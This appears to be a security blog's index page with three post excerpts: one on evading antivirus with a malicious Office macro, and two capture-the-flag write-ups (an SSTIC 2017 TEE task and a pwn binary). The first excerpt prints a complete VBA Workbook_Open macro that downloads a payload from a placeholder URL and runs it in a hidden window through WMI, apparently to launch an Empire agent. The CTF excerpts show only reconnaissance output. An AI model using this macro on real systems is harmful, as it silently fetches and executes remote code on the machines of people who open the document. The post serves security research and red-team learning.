I always heard bypassing AVs was really easy, I wanted to see it for myself. The goal here was to get an execute an Empire agent through a malicious macro. AVs tend to dislike macros for good reasons so I figured it would give me a good overview of the difficulty. Surprisingly, I couldn’t find a working example anywhere. There is obviously a lot of AV evasion techniques literature online or even tools who claim to bypass AVs, but somehow I couldn’t make them work to execute an Empire agent from a macro. I won’t go too much into detail, I’ll just point out the main techniques I used and where I got them from. So here it is : Private Sub Workbook_Open() Dim myURL As String myURL = “http://URL:PORT/PAYLOAD” Dim WinHttpReq As Object Set WinHttpReq = CreateObject(“Microsoft.XMLHTTP”) WinHttpReq.Open “GET”, myURL, False WinHttpReq.send Dim payload payload = WinHttpReq.ResponseText If WinHttpReq.Status = 200 Then Const HIDDEN_WINDOW = 5 strComputer = “.” Set objWMIService = GetObject(“winmgmts:” & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2”) Set objStartup = objWMIService.Get(“Win32_ProcessStartup”) Set objConfig = objStartup.SpawnInstance_ objConfig.ShowWindow = HIDDEN_WINDOW Set objProcess = GetObject(“winmgmts:root\cimv2:Win32_Process”) errReturn = objProcess.Create(payload, Null, objConfig, intProcessID) End If End Sub The previous code is pretty…
Author: m0rphine
Symposium sur la Sécurité des Techologies de l’Information et des Communications is a security conference held each year in Rennes, France. Each year, they release a challenge usually divided into several smaller tasks. 2017 was my third participation and, just like the previous editions, it has proven to be really challenging and interesting, so I highly recommand giving it a try ! Today’s post will be a write up of the 3rd task. I particuliary enjoyed this one, so I’m gonna share it here. Background : Once you complete the first task, you’re given instructions to setup the environment for the rest of the challenge and here’s what it looks like when you’re done doing it : What’s you’re seeing is an OpenRisk1000 virtual machine written in Javascript (based on the opensource project jor1k) and executed in a web browser. It is worth mentioning the presence of a Trusted Execution Environment (TEE), in the shape of a second virtual machine, this time for the RiscV architecture. First approach : The zip archive contains 4 files : 2 binaries : TA.elf.signed : ELF 32-bit LSB executable, UCB RISC-V, version 1 (SYSV), statically linked, not stripped trustzone_decrypt : ELF 32-bit MSB…
Description : Growing up and being bored in school, Samual Jr. takes a look at different cloud-driven options for exam preparation. Reaching for the stars takes more than just math, right? Teach him a lesson! nc flatearth.fluxfingers.net 1745 First steps : Let’s take a quick look at the binary : ➜ exam ~/tools/checksec.sh/checksec –file exam RELRO STACK CANARY NX PIE RPATH RUNPATH FORTIFY Fortified Fortifiable FILE Full RELRO Canary found NX enabled PIE enabled No RPATH No RUNPATH Yes 0 4 exam ➜ exam file exam exam: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=9be14b9fa354dbb844460d8d07daa6cd7c2ee40a, not stripped Considering the hardening mechanisms in place (PIE, RELRO, Stack Canary, NX) and the low amount of points (200), we shouldn’t look for something too fancy like ROP in order to complete the challenge. I went ahead and ran the program to see what it did : ➜ exam ./exam Welcome to ExamSim! Here you can augment your exam preparation work with automated crib creation capabilities. Our algorithm will hand pick only the most important facts from your previous summaries to allow you to push your grades to the next level! ======== 1. add summary…